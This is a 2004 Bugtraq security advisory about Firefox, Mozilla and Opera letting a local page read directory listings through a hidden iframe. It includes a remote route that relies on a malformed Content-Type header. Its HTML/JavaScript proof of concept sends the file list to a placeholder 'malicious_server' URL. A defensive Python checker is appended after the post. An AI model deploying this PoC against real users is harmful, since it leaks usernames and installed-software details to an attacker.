Disclosure of file system information in Mozilla Firefox and Opera Browser:

From: Giovanni Delvecchio (badpenguin79_at_hotmail.com)
Date: 12/01/04

    To: bugtraq@securityfocus.com
    Date: Wed, 01 Dec 2004 16:15:25 +0000
    
    

    Title: Disclosure of file system information in Mozilla Firefox and Opera
    Browser

    Note:
    I don't know if it could really be considered a security problem; anyway,
    I'll try to explain my ideas.
    Sorry for my bad English.

    Author: Giovanni Delvecchio

    Bug: Disclosure of file system information

    Applications affected:

    - Firefox 1.0
    - Mozilla 1.7
    - Opera 7.54 (*)

    (maybe also previous versions)

    Tested versions:

    - Firefox 1.0 on Linux and Windows
    - Mozilla 1.7 on Windows
    - Opera 7.51,..7.54 on Linux

    Note:
    The content of this advisory could also apply to other browsers; I have
    checked just Mozilla, Firefox, Opera and Microsoft Internet Explorer.
    Microsoft Internet Explorer seems not to be affected.

    Bug Description:
    ================
    A problem exists in some browsers where a frame can gain access to
    attributes of another frame or iframe.
    One application of this bug is the disclosure of the local directory
    structure.

    PoC:
    ===

    ------ begin code.htm -----

    <html>

    <body onLoad="
      list_files='';
      for(i=0;i<local_files.document.links.length;i++)
        {list_files+=local_files.document.links.item(i);}
      alert(list_files);
      //send list_files to malicious_server
      document.location.href='http://malicious_server/grab.php?list='+list_files;
    ">

    <iframe name="local_files" src="file:///home/" height=0 width=0></iframe>

    </body>

    </html>

    ------ end of code.htm -------

    Impact:
    ======
    A malicious server could obtain the content of the /home/ directory (or
    C:\Documents and Settings\ on Windows systems) and so learn a set of
    usernames present on the target system.
    Moreover, it could be possible to learn whether a particular program is
    installed on the target system, for use in a subsequent attack.

    However, it cannot be exploited "directly" by a remote site, but only if
    the page is opened from a local path (file://localpath/code.htm), since the
    iframe "local_files" belongs to a local domain.

    Note: with Internet Explorer, code.htm doesn't work even when opened locally.

    Possible Remote Exploitation:
    ========================

    Question:
    How could a malicious remote user exploit it ?

    Answer:
    After the "victim" user has requested http://malicious_server/code.htm,
    if malicious_server responds with a page carrying an unknown Content-Type
    field (for example text/html. , note the dot), the browser shows a
    dialog window with some options (open, save, cancel). If the user chooses
    "Open" to view this page, it is downloaded and opened locally; the
    JavaScript code is then executed in the local context.
    Obviously, if the user chooses to save the page and opens it afterwards,
    the result is the same.

    (*) For Opera, this method of remote exploitation requires that Opera be
    set as the Default Application in "handler for saved files" when the
    user chooses "Open" in the dialog window.

    Solution:
    ========
    No solution at the moment

    Vendor notice
    ==============
    24th November 2004: I have contacted Mozilla at security@mozilla.org
    and Opera through its bug tracking page at https://bugs.opera.com/wizard/

    No response from either at the moment.

    Best regards,

    Giovanni Delvecchio
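
A defensive check for the remote vector described in the advisory, as an added example that is not part of the original post: it audits an HTTP response (for instance at a proxy) for a Content-Type that is a near miss of a type rendered inline, such as the advisory's `text/html.`, and for frames that point at a `file:` URL. The `RENDERED_INLINE` list, the finding names and the sample body are assumptions constructed for illustration.

```python
import re
from html.parser import HTMLParser

# Assumed short list of types a browser renders inline; any other type
# leads to the open/save/cancel dialog the advisory describes.
RENDERED_INLINE = {"text/html", "text/plain", "application/xhtml+xml"}

# Constructed sample body: a scripted page framing a local directory.
SAMPLE_BODY = ('<html><body onload="init()">'
               '<iframe name="local_files" src="file:///home/" height=0 width=0>'
               '</iframe></body></html>')

class FrameFinder(HTMLParser):
    """Records file: frames and whether the markup carries any script."""
    def __init__(self):
        super().__init__()
        self.local_frames = []
        self.has_script = False

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)  # tag and attribute names arrive lowercased
        if tag in ("iframe", "frame"):
            src = (attrs.get("src") or "").strip().lower()
            if src.startswith("file:"):
                self.local_frames.append(src)
        # Heuristic: a <script> element or any on* event-handler attribute.
        if tag == "script" or any(k.startswith("on") for k in attrs):
            self.has_script = True

def audit_response(content_type, body):
    """Return finding names for one response (header value, decoded body)."""
    declared = content_type.split(";", 1)[0].strip().lower()
    finder = FrameFinder()
    finder.feed(body)
    finder.close()
    findings = []
    if declared not in RENDERED_INLINE:
        # "text/html." becomes "text/html" once trailing punctuation is dropped.
        if re.sub(r"[^a-z0-9]+$", "", declared) in RENDERED_INLINE:
            findings.append("near-miss-type")
        # Scripted HTML that will be offered for download instead of rendered.
        if finder.has_script:
            findings.append("scripted-html-not-rendered-inline")
    if finder.local_frames:
        findings.append("file-scheme-frame")
    return findings

if __name__ == "__main__":
    print(audit_response("text/html.", SAMPLE_BODY))
```
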
